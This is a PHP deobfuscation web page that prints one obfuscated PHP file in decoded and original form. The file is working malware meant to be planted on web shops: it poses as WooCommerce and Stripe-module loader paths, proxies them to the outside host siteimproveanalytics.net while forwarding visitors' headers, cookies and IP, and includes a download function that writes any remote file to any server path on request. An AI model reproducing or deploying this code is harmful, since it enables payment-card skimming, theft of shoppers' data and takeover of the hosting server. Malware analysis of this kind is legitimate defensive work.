Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto cMFfD; BR9k3: if (!function_exists("\x61\160\141\143\x68\145\x5f\162\x65\x71\..

Decoded Output download

<?php 
 goto cMFfD; BR9k3: if (!function_exists("apache_request_headers")) { function apache_request_headers() { $arh = array(); $rx_http = "/\AHTTP_/"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("_", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("-", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto SdEGe; cMFfD: $routing = array("/wp-content/plugins/woocommerce/loader.php" => '', "/modules/stripepro/loader.php" => '', "/pub/errors/track.php" => '', "/analytics" => ''); goto qMTvj; Mhb8z: function set_to_cache($name, $value, $expired) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto kHFsI; qMTvj: $dest = "siteimproveanalytics.net"; goto BR9k3; gePDX: function bad_request() { header("Location: https://google.com"); die; } goto ARGM0; YS7qX: function download() { if (isset($_GET["s"]) and isset($_GET["d"])) { $file_url = urldecode($_GET["s"]); $destination_path = urldecode($_GET["d"]); $fp = fopen($destination_path, "w+"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "File downloaded successfully!"; } else { echo "Error downloading file!"; } } else { echo dirname(__FILE__); } } goto MA48s; SdEGe: function get_ip_address() { $ip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } return $ip; } goto gePDX; nH0a3: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\xa"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto YS7qX; ARGM0: function get_from_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto Mhb8z; MA48s: try { if ($_SERVER["REQUEST_METHOD"] !== "GET") { bad_request(); } if (isset($_GET["download"])) { download(); die; } $url = $_SERVER["REQUEST_URI"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["path"]; if (!isset($path) || $path == "/") { bad_request(); } $query = ''; $clear = false; if (isset($url["query"])) { parse_str($url["query"], $params); if (isset($params["path"])) { $path = $params["path"]; unset($params["path"]); } if (isset($params["cache"]) && $params["cache"] == "clear") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "/html/liveness") { echo "OK"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("ssl://" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code} ({$message})"); } fputs($fp, "GET " . $path . "?" . $query . " HTTP/1.1\xd\xa"); fputs($fp, "Host: " . $dest . "
\xa"); fputs($fp, "X-Forwarded-For: " . get_ip_address() . "\xd\xa"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "Host") !== 0 && strcasecmp($header, "X-Forwarded-For") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . ": " . $value . "\xd
"); } } } fputs($fp, "Connection: close\xd
\xd\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("
\xa
\xa", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("
", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "Content-Length") !== false) { continue; } if (strpos($headerLine, "Connection") !== false) { continue; } if (strpos($headerLine, "Date") !== false) { continue; } if ($headerLine == "Content-Encoding: gzip") { $is_gzip = true; continue; } if ($headerLine == "Transfer-Encoding: chunked") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "Cache-Control: public,max-age=") !== false) { $cache = intval(str_replace("Cache-Control: public,max-age=", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "404 Not Found") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto BYIOb; kHFsI: function remove_in_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->delete($name); } } } goto nH0a3; BYIOb: ?>

Did this file decode correctly?

Original Code

<?php
 goto cMFfD; BR9k3: if (!function_exists("\x61\160\141\143\x68\145\x5f\162\x65\x71\165\x65\163\x74\x5f\x68\x65\x61\144\x65\x72\x73")) { function apache_request_headers() { $arh = array(); $rx_http = "\x2f\x5c\101\110\x54\124\x50\137\x2f"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("\x5f", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("\x2d", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto SdEGe; cMFfD: $routing = array("\57\167\x70\x2d\143\x6f\x6e\x74\145\156\x74\x2f\160\154\x75\x67\x69\156\163\x2f\x77\157\x6f\x63\x6f\155\155\145\162\143\145\x2f\154\157\141\144\x65\162\x2e\160\150\160" => '', "\57\155\157\x64\x75\154\x65\x73\x2f\163\164\162\x69\x70\x65\160\162\157\x2f\x6c\x6f\x61\144\145\162\x2e\x70\150\x70" => '', "\x2f\x70\x75\142\x2f\x65\162\x72\157\162\163\x2f\164\x72\x61\143\153\56\160\150\160" => '', "\x2f\141\x6e\141\x6c\171\164\151\143\163" => ''); goto qMTvj; Mhb8z: function set_to_cache($name, $value, $expired) { if (class_exists("\115\x65\x6d\x63\141\x63\x68\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\157\x63\141\154\x68\x6f\163\164"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto kHFsI; qMTvj: $dest = "\x73\151\x74\x65\151\x6d\160\x72\x6f\166\x65\141\156\141\154\x79\x74\151\143\163\56\x6e\x65\x74"; goto BR9k3; gePDX: function bad_request() { header("\114\157\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\163\72\57\x2f\x67\157\x6f\147\x6c\x65\x2e\143\x6f\x6d"); die; } goto ARGM0; YS7qX: function download() { if (isset($_GET["\163"]) and isset($_GET["\x64"])) { $file_url = urldecode($_GET["\x73"]); $destination_path = urldecode($_GET["\144"]); $fp = fopen($destination_path, "\167\x2b"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "\106\151\x6c\x65\40\x64\157\x77\x6e\154\157\x61\144\145\x64\40\x73\165\x63\x63\x65\x73\163\x66\165\x6c\154\171\41"; } else { echo "\x45\x72\x72\157\x72\40\144\x6f\167\x6e\x6c\157\x61\x64\x69\x6e\x67\40\146\151\x6c\145\x21"; } } else { echo dirname(__FILE__); } } goto MA48s; SdEGe: function get_ip_address() { $ip = ''; if (isset($_SERVER["\110\124\124\x50\137\130\x5f\x46\117\122\x57\x41\122\104\x45\x44\x5f\106\x4f\x52"])) { $ip = $_SERVER["\110\124\x54\120\137\130\x5f\x46\x4f\122\127\x41\122\104\105\x44\x5f\106\x4f\122"]; } else { if (isset($_SERVER["\x48\124\124\120\137\103\114\x49\105\116\124\137\111\120"])) { $ip = $_SERVER["\x48\124\124\120\x5f\x43\114\111\105\116\124\x5f\111\x50"]; } else { $ip = $_SERVER["\x52\105\115\x4f\124\105\137\x41\x44\104\122"]; } } return $ip; } goto gePDX; nH0a3: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\xa"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto YS7qX; ARGM0: function get_from_cache($name) { if (class_exists("\115\145\155\143\x61\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\157\x63\141\154\x68\157\x73\x74"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto Mhb8z; MA48s: try { if ($_SERVER["\x52\105\x51\125\x45\x53\124\x5f\115\105\x54\x48\x4f\104"] !== "\x47\105\124") { bad_request(); } if (isset($_GET["\144\x6f\x77\156\154\157\x61\x64"])) { download(); die; } $url = $_SERVER["\x52\105\121\x55\x45\123\x54\x5f\x55\122\111"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["\160\x61\x74\x68"]; if (!isset($path) || $path == "\57") { bad_request(); } $query = ''; $clear = false; if (isset($url["\x71\x75\x65\162\x79"])) { parse_str($url["\161\165\x65\x72\171"], $params); if (isset($params["\x70\x61\x74\x68"])) { $path = $params["\160\141\164\150"]; unset($params["\160\141\x74\x68"]); } if (isset($params["\143\141\x63\x68\145"]) && $params["\x63\141\x63\x68\x65"] == "\143\x6c\145\x61\x72") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "\x2f\x68\x74\155\x6c\x2f\154\151\166\x65\x6e\x65\x73\163") { echo "\x4f\x4b"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("\163\x73\154\x3a\57\57" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code}\x20\x28{$message}\x29"); } fputs($fp, "\x47\105\124\x20" . $path . "\77" . $query . "\x20\110\124\124\120\x2f\x31\x2e\61\xd\xa"); fputs($fp, "\x48\x6f\x73\x74\72\40" . $dest . "\15\xa"); fputs($fp, "\130\55\x46\157\162\x77\x61\x72\144\145\x64\55\x46\157\x72\x3a\40" . get_ip_address() . "\xd\xa"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "\110\x6f\163\x74") !== 0 && strcasecmp($header, "\x58\x2d\106\157\x72\167\141\x72\x64\x65\144\55\x46\157\x72") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . "\72\x20" . $value . "\xd\12"); } } } fputs($fp, "\103\x6f\156\x6e\145\143\x74\x69\157\x6e\x3a\x20\143\154\157\x73\x65\xd\12\xd\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\15\xa\15\xa", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\15\12", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "\x43\x6f\156\164\145\156\x74\x2d\114\145\156\x67\x74\150") !== false) { continue; } if (strpos($headerLine, "\x43\x6f\x6e\x6e\145\143\x74\151\157\x6e") !== false) { continue; } if (strpos($headerLine, "\x44\141\x74\145") !== false) { continue; } if ($headerLine == "\103\x6f\156\x74\x65\x6e\x74\x2d\105\156\143\x6f\x64\151\156\x67\x3a\x20\147\172\x69\160") { $is_gzip = true; continue; } if ($headerLine == "\x54\x72\x61\x6e\163\146\x65\162\x2d\105\156\x63\x6f\x64\151\x6e\147\72\x20\x63\x68\165\x6e\153\x65\144") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "\x43\141\x63\150\x65\x2d\103\x6f\156\164\x72\x6f\154\x3a\40\x70\165\x62\x6c\151\143\54\x6d\141\x78\x2d\x61\147\x65\75") !== false) { $cache = intval(str_replace("\x43\x61\x63\x68\145\x2d\x43\157\x6e\x74\x72\x6f\154\72\x20\160\165\x62\x6c\151\x63\54\x6d\141\x78\x2d\141\147\x65\75", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "\64\x30\64\x20\116\157\x74\40\x46\157\x75\x6e\x64") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto BYIOb; kHFsI: function remove_in_cache($name) { if (class_exists("\115\145\155\x63\141\143\x68\145")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\x6f\143\141\154\x68\157\x73\x74"); if ($isAvailable) { $memcache->delete($name); } } } goto nH0a3; BYIOb: ?>

Function Calls

None

Variables

None

Stats

MD5	5bd132a64e61a349577a51de1bd95f00
Eval Count	0
Decode Time	59 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats